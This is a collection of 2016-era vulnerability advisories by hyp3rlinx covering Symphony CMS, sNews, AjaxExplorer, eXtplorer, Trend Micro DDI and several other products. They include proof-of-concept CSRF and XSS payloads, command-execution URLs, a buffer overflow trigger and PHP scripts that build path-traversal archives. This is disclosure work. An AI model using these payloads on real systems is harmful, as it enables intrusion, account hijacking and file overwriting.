The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
Symphony CMS v2.6.7 Session Fixation
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SYMPHONY-CMS-SESSION-FIXATION.txt [+] ISR: APPARITIONSEC Vendor: www.getsymphony.com Product: == Symphony CMS v2.6.7 Download: http://www.getsymphony.com/download/ Symphony is a XSLT-powered open source content management system. Vulnerability Type: === Session Fixation CVE Reference: == CVE-2016-4309 Vulnerability Details: = Symphony CMS is prone to "Session Fixation" allowing attackers to preset a users PHPSESSID "Session Identifier". If the application is deployed using an insecure setup with PHP.INI "session.use_only_cookies" not enabled, attackers can then send victims a link to the vulnerable application with the "PHPSESSID" already initialized as Symphony does not use or call "session_regenerate_id()" upon successful user authentication. Note: as per php.net/manual/en/session.configuration.php "session.use_only_cookies=1" is default since PHP 4.3.0. e.g. "http://localhost/symphony/?PHPSESSID=APPARITION666;. As Symphonys Session ID is not regenerated it can result in arbitrary Session ID being 'Fixated' to a user, if that user authenticates using this attacker supplied session fixated link, the attacker can now access the affected application from a different Computer/Browser and have the same level of access to that of the victim. Default Cookie lifetime for Symphony CMS is up to two weeks. Reproduction steps: = Edit PHP.INI and change following settings to 'session.use_only_cookies=0' if applicable, as POC test. 1) Telnet localhost 80 2) make HTTP request with a prefixed PHPSESSID GET /symphony-2.6.7/symphony/?PHPSESSID=PWN3D666 HTTP/1.1 Host: localhost Connection: close 3) Hit enter twice HTTP/1.1 200 OK Date: Mon, 16 May 2016 02:06:47 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1l PHP/5.6.8 X-Powered-By: PHP/5.6.8 Set-Cookie: PHPSESSID=PWNED666; expires=Mon, 30-May-2016 02:06:48 GMT; Max-Age=1209600; path=/symphony-2.6.7; httponly Content-Length: 1501 Connection: close Content-Type: text/html; charset=UTF-8 Exploit code(s): === 1) http://localhost/symphony-2.6.7/symphony/publish/articles/?PHPSESSID=hyp3rlinx 2) http://localhost/symphony-2.6.7/symphony/?PHPSESSID=APPARITION Disclosure Timeline: = Vendor Notification: May 3, 2016 Vendor Release Fix: May 23, 2016 June 20, 2016 : Public Disclosure. Exploitation Method: Remote Severity Level: 6.8 (Medium) CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N Description: == Request Method(s): [+] GET / POST Vulnerable Product: [+] Symphony CMS 2.6.7 Vulnerable Parameter(s): [+] 'PHPSESSID' === [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
sNews CMS v1.7.1 Remote Command Execution / CSRF / XSS
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SNEWS-RCE-CSRF-XSS.txt
[+] ISR: APPARITIONSEC
Vendor:
snewscms.com
Product:
sNews CMS v1.7.1
Vulnerability Type:
===
Persistent Remote Command Execution
Cross Site Request Forgeries (CSRF)
Persistent XSS
CVE Reference:
==
N/A
Vulnerability Details:
==
If an authenticated user happens to stumble upon an attackers webpage or click
an infected link they have a chance to get the following prizes,
1) Persistent Remote Code Execution
2) Cross Site Request Forgeries
3) Persistent XSS
sNews has feature that allows PHP functions to be inserted for articles by
authenticated users under "Edit Article". However, there is no
CSRF token/checks to prevent unauthorized HTTP requests to be made on behalf of
that user. Furthermore, these commands will get stored in MySQL
database in the 'articles' table. So each time that sNews webpage is visited it
will execute.
e.g.
CSRF / RCE Under "Edit Article" Admin area.
[func]system:|:"calc.exe"[/func]
On line no 3270 of "snews.php" there is no input filtering allowing arbitrary
system calls.
$returned = call_user_func_array($func[0], explode(',',$func[1]));
CSRF / Hijack SNews CMS accounts, the username however must be known in
advance, if known then that lucky user wins a changed password!.
CSRF / arbitrary file deletion, we can delete arbitrary files in the webroot
which we can use to bypass access controls like ".htaccess" file.
allowing attackers to read/access files from those affected directories.
On line 3080 "snews.php" direct usage of untrusted user input into the PHP
"unlink" function which deletes any files the attacker wants.
if (isset($_GET['task']) == 'delete') {
$file_to_delete = $_GET['folder'].'/'.$_GET['file'];
@unlink($file_to_delete);
echo notification(0,'','snews_files');
///
Persistent XSS entry point also exists in same "Edit Article" Admin area, but
why bother when we have RCE option.
Exploit code(s):
===
Remote Command Execution pop "calc.exe" POC.
http://localhost/snews1.7.1/?action=process=admin_article=2;>
document.getElementById('CSRF_RCE_PRIZE').submit()
After we make HTTP request for the booby trapped article and KABOOM.
http://localhost/snews1.7.1/uncategorized/remote-command-execution/
CSRF - Account Hijack
=
http://localhost/snews1.7.1/?action=process=changeup;>
document.getElementById('CSRF-CHG-PASSWD-PRIZE').submit()
CSRF - Arbitrary File Deletion
===
1) Create file in htdocs / web root as a test e.g. "DELETEME.php"
2) Visit following URL as authenticated user.
http://localhost/snews1.7.1/?action=snews_files=delete=Patches
Log=../../../DELETEME.php
3) Files gone!
Persistent XSS
===
http://localhost/snews1.7.1/?action=process=admin_article=2;>
document.getElementById('XSS').submit()
Disclosure Timeline:
=
Vendor Notification: No Replies
June 19, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
Critical
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
Description:
Request Method(s):[+] GET / POST
Vulnerable Product: [+] snews v1.7.1
===
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
by hyp3rlinx
Oracle Orakill.exe Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-ORAKILL.EXE-BUFFER-OVERFLOW.txt [+] ISR: apparitionsec Vendor: == www.oracle.com Product: === orakill.exe v11.2.0 The orakill utility is provided with Oracle databases on Windows platforms. The executable (orakill.exe) is available to DBAs to kill Oracle sessions directly from the DOS command line without requiring any connection to the database. C:\oraclexe\app\oracle\product\11.2.0\server\bin>orakill.exe -h Usage: orakill sid thread where sid = the Oracle instance to target thread = the thread id of the thread to kill The thread id should be retrieved from the spid column of a query such as: select spid, osuser, s.program from v$process p, v$session s where p.addr=s.paddr Vulnerability Type: === Buffer Overflow Reference: == http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html Vulnerability Details: = ToLower() filter being applied to supplied arguments e.g. 'A' \x41 beomes 'a' \x61 etc... may be possible to subvert using encoder technique like "ALPHA3". Also we need to supply a second argument of just 4 bytes to trigger the access violation. orakill.exe <104 bytes>, <4 bytes> Register dump. EAX 4000 ECX 0018FCA8 ASCII "" EDX EBX 61616161 ESP 0018FD10 ASCII "" EBP 61616161 ESI 61616161 EDI 61616161 EIP 61616161 C 0 ES 002B 32bit 0() P 0 CS 0023 32bit 0() A 0 SS 002B 32bit 0() Z 0 DS 002B 32bit 0() S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0() D 0 O 0 LastErr ERROR_SUCCESS () EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G) ST0 empty g ST1 empty g ST2 empty g ST3 empty g ST4 empty g ST5 empty g ST6 empty g ST7 empty g 3 2 1 0 E S P U O Z D I FST Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) FCW 027F Prec NEAR,53 Mask1 1 1 1 1 1 Exploit code(s): import subprocess pgm="C:\\oraclexe\\app\\oracle\\product\\11.2.0\\server\\bin\\orakill.exe " payload="A"*100 + "" subprocess.Popen([pgm, payload, " "], shell=False) Disclosure Timeline: Vendor Notification: October 5, 2015 Vendor Fix: April 25, 2016 June 13, 2016 : Public Disclosure Exploitation Technique: === Local Severity Level: Low [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
SimpleSAMLphp Link Injection
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SIMPLESAML-PHP-LINK-INJECTION.txt
[+] ISR: apparitionsec
Vendor:
=
simplesamlphp.org
Product:
==
simplesamlphp < 1.14.4
Vulnerability Type:
===
Link Injection
CVE Reference:
==
N/A
Vulnerability Details:
=
Several scripts part of SimpleSAMLphp display a web page with links obtained
from the request parameters. This is supposed to enhance
usability, as the users are presented with links they can follow after
completing a certain action, like logging out.
The following scripts do not check the URLs obtained via the HTTP request
before displaying them as the target of links that the user
may click on:
www/logout.php
modules/core/www/no_cookie.php
The issue allowed attackers to display links targeting a malicious website
inside a trusted site running SimpleSAMLphp, due to the lack
of security checks involving the link_href and retryURL HTTP parameters,
respectively. The issue was resolved by including a verification
of the URLs received in the request against a white list of websites specified
in the trusted.url.domains configuration option.
References:
https://simplesamlphp.org/security/201606-01
Affected versions:
All SimpleSAMLphp versions prior to 1.14.4.
Impact:
A remote attacker could craft a link or pop up webpage pointing to a trusted
website running SimpleSAMLphp, including a parameter pointing
to a malicious website, to fool the victim into visiting that website by
clicking on a link in the page presented by the "trusted" SimpleSAMLphp
application.
Vulnerable Codes:
"no_cookie.php" ...
==
if (isset($_REQUEST['retryURL'])) {
$retryURL = (string)$_REQUEST['retryURL'];
$retryURL = \SimpleSAML\Utils\HTTP::normalizeURL($retryURL);
} else {
$retryURL = NULL;
}
$globalConfig = SimpleSAML_Configuration::getInstance();
$t = new SimpleSAML_XHTML_Template($globalConfig, 'core:no_cookie.tpl.php');
$t->data['retryURL'] = $retryURL;
$t->show();
"logout.php" ...
if (array_key_exists('link_href', $_REQUEST)) {
$link = (string) $_REQUEST['link_href'];
$link = \SimpleSAML\Utils\HTTP::normalizeURL($link);
} else {
$link = 'index.php';
}
if (array_key_exists('link_text', $_REQUEST)) {
$text = $_REQUEST['link_text'];
} else {
$text = '{logout:default_link_text}';
}
$t = new SimpleSAML_XHTML_Template($config, 'logout.php');
$t->data['link'] = $link;
$t->data['text'] = $text;
$t->show();
Exploit code(s):
===
1)
https://victim-server/simplesaml/module.php/core/no_cookie.php?retryURL=https://attacker-server
2)
https://victim-server/simplesaml/logout.php?link_href=http://attacker-server/Evil.php_text=PLEASE%20DOWNLOAD%20THIS%20IMPORTANT%20UPDATE
Disclosure Timeline:
===
Vendor Notification: May 31, 2016
June 9, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
Low
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
AjaxExplorer v1.10.3.2 Remote CMD Execution / CSRF / Persistent XSS
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AJAXEXPLORER-REMOTE-CMD-EXECUTION.txt
[+] ISR: apparitionsec
Vendor:
==
sourceforge.net
smsid
download linx:
sourceforge.net/projects/ajax-explorer/files/
Product:
===
AjaxExplorer v1.10.3.2
Manage server files through simple windows like interface.
Vulnerability Type:
===
Remote Command Execution
CSRF
Persistent XSS
CVE Reference:
==
N/A
Vulnerability Details:
=
AjaxExplorer has command terminal feature where you can move, copy, delete
files etc... also lets a user save commands in a
flat file named "terminal" under their user profile "/ae.user/owner/myprofile".
e.g.
copy [FILEPATH + FILENAME] [FILEPATH]
create [FILEPATH + FILENAME]
Since AjaxExplorer also suffers from CSRF vulnerability we can exploit the
application by first creating an .htaccess file with an
"allow from all" directive to bypass access restrictions, next create arbitrary
PHP files for remote command execution purposes.
This exploit will require two consecutive HTTP requests, so we need to target
an iframe to stay on same page until exploit is completed.
Exploit code(s):
===
1) first POST request creates .htaccess file so we can bypass directory
browsing restrictions.
2) second POST writes our remote command execution file we will then access to
execute commands on the victim system.
The below P:/ for "strPath" form value is for "Profile"
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php;
method="post">
document.getElementById('htaccess').submit()
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php;
method="post">
document.getElementById('RCE').submit()
Now we can access and run arbitrary cmds.
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/ae.user/owner/myprofile/terminal.php?cmd=c:\\Windows\\system32\\calc.exe
/
Here is another way to RCE this application... first create PHP file then edit.
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php;>
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php;>
document.getElementById('CSRF1').submit()
document.getElementById('CSRF2').submit()
Persistent XSS:
We can also write persistent XSS payload to the user profile "terminal" file.
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php;>
document.getElementById('XSS').submit()
Disclosure Timeline:
===
Vendor Notification: NA
June 1, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
8.0 (High)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
dns_dhcp Web Interface SQL Injection
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/DNS_DHCP-WEB-INTERFACE-SQL-INJECTION.txt
[+] ISR: apparitionsec
Vendor:
tmcdos / sourceforge
Product:
==
dns_dhcp Web Interface
Download: sourceforge.net/projects/dnsmasq-mikrotik-admin/?source=directory
This is a very simple web interface for management of static DHCP leases in
DNSmasq and Mikrotik.
It generates config files for DNSmasq and uses RouterOS API to manage Mikrotik.
Network devices (usually PCs)
are separated into subnets by department and use triplets (hostname, MAC
address, IP address) for identification.
Information is stored in MySQL.
Vulnerability Type:
===
SQL Injection
CVE Reference:
==
N/A
Vulnerability Details:
=
The 'net' HTTP form POST parameter to dns.php script is not checked/santized
and is used directly in MySQL query allowing
attacker to easily exfiltrate any data from the backend database by using SQL
Injection exploits.
1) On line 239 of dns.php
$b = str_replace('{FIRMA}',a_select('SUBNET',$_REQUEST['net']),$b);
2)
dns.php line 187 the a_select function where 2nd argument $_REQUEST['net'] is
passed to an concatenated to query ($clause)
and executed on line 194 mysql_query($query).
function a_select($tbl,$clause,$field='',$where='')
{
if ($clause==0) return '';
if($field=='') $field=$tbl;
$query = "SELECT $field FROM $tbl WHERE ";
if($where=='') $query.='ID='.$clause;
else $query.=$where;
$res = mysql_query($query) or
trigger_error($query.''.mysql_error(),E_USER_ERROR);
if(mysql_num_rows($res)>0) return mysql_result($res,0,0);
else return '';
}
Exploit code(s):
===
Run from CL...
Disclosure Timeline:
===
Vendor Notification: NA
May 14, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
High
Description:
==
Request Method(s):[+] POST
Vulnerable Product: [+] dns_dhcp Web Interface
Vulnerable Parameter(s): [+] 'net'
=
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
eXtplorer v2.1.9 Archive Path Traversal
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/EXTPLORER-ARCHIVE-PATH-TRAVERSAL.txt
[+] ISR: apparitionsec
Vendor:
==
extplorer.net
Product:
==
eXtplorer v2.1.9
eXtplorer is a PHP and Javascript-based File Manager, it allows to browse
directories, edit, copy, move, delete,
search, upload and download files, create & extract archives, create new files
and directories, change file
permissions (chmod) and more. It is often used as FTP extension for popular
applications like Joomla.
Vulnerability Type:
==
Archive Path Traversal
CVE Reference:
==
CVE-2016-4313
Vulnerability Details:
=
eXtplorer unzip/extract feature allows for path traversal as decompressed files
can be placed outside of the intended target directory,
if the archive content contains "../" characters. This can result in files like
".htaccess" being overwritten or RCE / back door
exploits.
Tested on Windows
Reproduction steps:
==
1) Generate an archive using below PHP script
2) Upload it to eXtplorer and then extract it
3) Check directory for the default 'RCE.php' file or use CL switch to overwrite
files like .htaccess
Exploit code(s):
===
Run below PHP script from CL...
[evil-archive.php]
, , ";exit();}
$zipname=$argv[1];
$exploit_file="RCE.php";
$cmd='';
if(!empty($argv[2])&_numeric($argv[2])){
$depth=$argv[2];
}else{
echo "Second flag must be numeric!, you supplied '$argv[2]'";
exit();
}
if(strtolower($argv[3])!="y"){
if(!empty($argv[3])){
$exploit_file=$argv[3];
}
if(!empty($argv[4])){
$cmd=$argv[4];
}else{
echo "Usage: enter a payload for file $exploit_file wrapped in double quotes";
exit();
}
}
$zip = new ZipArchive();
$res = $zip->open("$zipname.zip", ZipArchive::CREATE);
$zip->addFromString(str_repeat("..\\", $depth).$exploit_file, $cmd);
$zip->close();
echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";
echo " by hyp3rlinx ===";
?>
///
[Script examples]
Use default RCE.php by passing "y" flag creating DOOM.zip with path depth of 2
levels
c:\>php evil-archive.php DOOM 2 Y
Create DOOM.zip with path depth of 4 levels and .htaccess file to overwrite one
on the system.
c:\>php evil-archive.php DOOM 4 .htaccess "allow from all"
Disclosure Timeline:
===
Vendor Notification: No reply
May 14, 2016 : Public Disclosure
Exploitation Method:
==
Local
Severity Level:
Medium 6.3
CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information.
hyp3rlinx
CAM UnZip v5.1 Archive Directory Traversal
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/CAMUNZIP-ARCHIVE-PATH-TRAVERSAL.txt
Vendor:
=
www.camunzip.com
Product:
==
CAM UnZip v5.1
Vulnerability Type:
==
Archive Path Traversal
CVE Reference:
==
N/A
Vulnerability Details:
=
CAM UnZip fails to check that the paths of the files in the archive do not
engage in path traversal when uncompressing the archive files.
specially crafted files in the archive containing '..\' in file name can
overwrite files on the filesystem by backtracking or allow attackers
to place malicious files on system outside of the target unzip directory which
may lead to remote command execution exploits etc...
Tested successfully Windows 7
Exploit code(s):
===
malicious archive script...
";exit();}
$file_name=$argv[1];
$zip = new ZipArchive();
$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '');
$zip->close();
echo "Malicious archive created...\r\n";
echo "= hyp3rlinx ";
?>
/
Result:
Creating Folder: C:\Test\BOZO
Extracting Files From: C:\Test\BOZO.zip
Unzipped file C:\Test\BOZO\..\..\..\..\..\..\..\..\RCE.php of size 28
1 file was Extracted.
C:\RCE.php
Exploitation Technique:
===
Local
Severity Level:
Medium
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
hyp3rlinx
WPN-XM Serverstack v0.8.6 CSRF - MySQL / PHP.INI Hijacking
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
Vendor:
===
wpn-xm.org
Product:
==
WPN-XM Serverstack for Windows - Version 0.8.6
WPN-XM is a free and open-source web server solution stack for professional PHP
development on the Windows platform.
Vulnerability Type:
CSRF - MySQL / PHP.INI Hijacking
CVE Reference:
==
N/A
Vulnerability Details:
=
WPN-XMs webinterface is prone to multiple CSRF entry points allowing remote
attackers to compromise an authenticated user if they visit
a malicious webpage or click an attacker supplied link. Attackers can modify
the 'PHP.INI' file to change arbitrary PHPs settings
like enable 'allow_url_include' or changing the default MySQL username &
password settings etc...
Exploit code(s):
===
1) Hijack MySQL Account Default Settings
http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;>
document.getElementById('CSRF-MySQL-Username').submit()
http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;>
document.getElementById('CSRF-MySQL-PWD').submit()
2) Hijack PHP.INI Settings
http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;>
document.getElementById('CSRF-PHP-INI').submit()
Disclosure Timeline:
=
Vendor Notification: No Reply
April 9, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
Medium
=
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
hyp3rlinx
WPN-XM Serverstack v0.8.6 CSRF - MySQL / PHP.INI Hijacking
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
Vendor:
===
wpn-xm.org
Product:
==
WPN-XM Serverstack for Windows - Version 0.8.6
WPN-XM is a free and open-source web server solution stack for professional PHP
development on the Windows platform.
Vulnerability Type:
CSRF - MySQL / PHP.INI Hijacking
CVE Reference:
==
N/A
Vulnerability Details:
=
WPN-XMs webinterface is prone to multiple CSRF entry points allowing remote
attackers to compromise an authenticated user if they visit
a malicious webpage or click an attacker supplied link. Attackers can modify
the 'PHP.INI' file to change arbitrary PHPs settings
like enable 'allow_url_include' or changing the default MySQL username &
password settings etc...
Exploit code(s):
===
1) Hijack MySQL Account Default Settings
http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;>
document.getElementById('CSRF-MySQL-Username').submit()
http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;>
document.getElementById('CSRF-MySQL-PWD').submit()
2) Hijack PHP.INI Settings
http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;>
document.getElementById('CSRF-PHP-INI').submit()
Disclosure Timeline:
=
Vendor Notification: No Reply
April 9, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
Medium
=
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
hyp3rlinx
CSRF - MySQL / PHP.INI Hijacking
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
Vendor:
===
wpn-xm.org
Product:
==
WPN-XM Serverstack for Windows - Version 0.8.6
WPN-XM is a free and open-source web server solution stack for professional PHP
development on the Windows platform.
Vulnerability Type:
CSRF - MySQL / PHP.INI Hijacking
CVE Reference:
==
N/A
Vulnerability Details:
=
WPN-XMs webinterface is prone to multiple CSRF entry points allowing remote
attackers to compromise an authenticated user if they visit
a malicious webpage or click an attacker supplied link. Attackers can modify
the 'PHP.INI' file to change arbitrary PHPs settings
like enable 'allow_url_include' or changing the default MySQL username &
password settings etc...
Exploit code(s):
===
1) Hijack MySQL Account Default Settings
http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;>
document.getElementById('CSRF-MySQL-Username').submit()
http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;>
document.getElementById('CSRF-MySQL-PWD').submit()
2) Hijack PHP.INI Settings
http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;>
document.getElementById('CSRF-PHP-INI').submit()
Disclosure Timeline:
=
Vendor Notification: No Reply
April 9, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
Medium
=
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
hyp3rlinx
WPN-XM Serverstack v0.8.6 XSS
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-XSS.txt Vendor: === wpn-xm.org Product: WPN-XM Serverstack for Windows - Version 0.8.6 WPN-XM is a free and open-source web server solution stack for professional PHP development on the Windows platform. Vulnerability Type: = Cross Site Scripting - XSS CVE Reference: == N/A Vulnerability Details: = WPN-XMs webinterface has cross site scripting security issues allowing remote attackers to execute client side code in the security context of the targeted domain undermining the trust between server & client. XSS attacks can result in data theft, session hijacking etc. Exploit code(s): === XSS 1 http://localhost/tools/webinterface/index.php?page=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E XSS 2 http://localhost/tools/webinterface/index.php?action=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E XSS 3 http://localhost/tools/webinterface/index.php?page=config=showtab=%22/%3E%3Cscript%3Ealert%281%29%3C/script%3E Disclosure Timeline: = Vendor Notification: No Reply April 9, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Low = [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. hyp3rlinx
TrendMicro DDI Cross Site Request Forgerys
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-DDI-CSRF.txt
Vendor:
www.trendmicro.com
Product:
=
Trend Micro Deep Discovery Inspector
V3.8, 3.7
Deep Discovery Inspector is a network appliance that gives you 360-degree
network monitoring of all traffic
to detect all aspects of a targeted attack.
Vulnerability Type:
Cross Site Request Forgery - CSRF
CVE Reference:
==
N/A
Vulnerability Details:
Trend Micro Deep Discovery suffers from multiple CSRF vectors, if an
authenticated user visits an malicious webpage attackers will
have ability to modify many settings of the Deep Discovery application to that
of the attackers choosing.
Reference:
http://esupport.trendmicro.com/solution/en-US/1113708.aspx
Trend Micro DDI is affected by CSRF vulnerabilities. These affect the following
console features:
Deny List Notifications
Detection Rules
Threat Detections
Email Settings
Network
Blacklisting/Whitelisting
Time
Accounts
Power Off / Restart
DETAILS
The following DDI versions prior to version 3.8 Service Pack 2 (SP2) are
affected:
3.8 English
3.8 Japanese
3.7 English
3.7 Japanese
3.7 Simplified Chinese
Trend Micro has released DDI 3.8 SP2. All versions up to version 3.8 SP1 must
upgrade to version 3.8 SP2 (Build 3.82.1133) to address this issue.
Exploit code(s):
===
1) Shut down all threat scans and malicious file submissions under:
Administration /Monitoring / Scanning / Threat Detections
https://localhost/php/scan_options.php; method="post">
document.getElementById('CSRF-ThreatScans').submit()
2) Whitelist C server menu location: Detections / C Callback Addresses
https://localhost/php/blacklist_whitelist_query.php; method="post">
document.getElementById('CSRF-Whitelist').submit()
3) Turn off or change email notifications
https://localhost/cgi-bin/mailSettings_set.cgi; method="post">
document.getElementById('CSRF-Notifications').submit()
4) Change system settings ( x.x.x.x = whatever IP we want )
https://localhost/cgi-bin/admin_ip.cgi; method="post">
document.getElementById('PWNED').submit()
Disclosure Timeline:
===
Vendor Notification: November 23, 2015
March 25, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
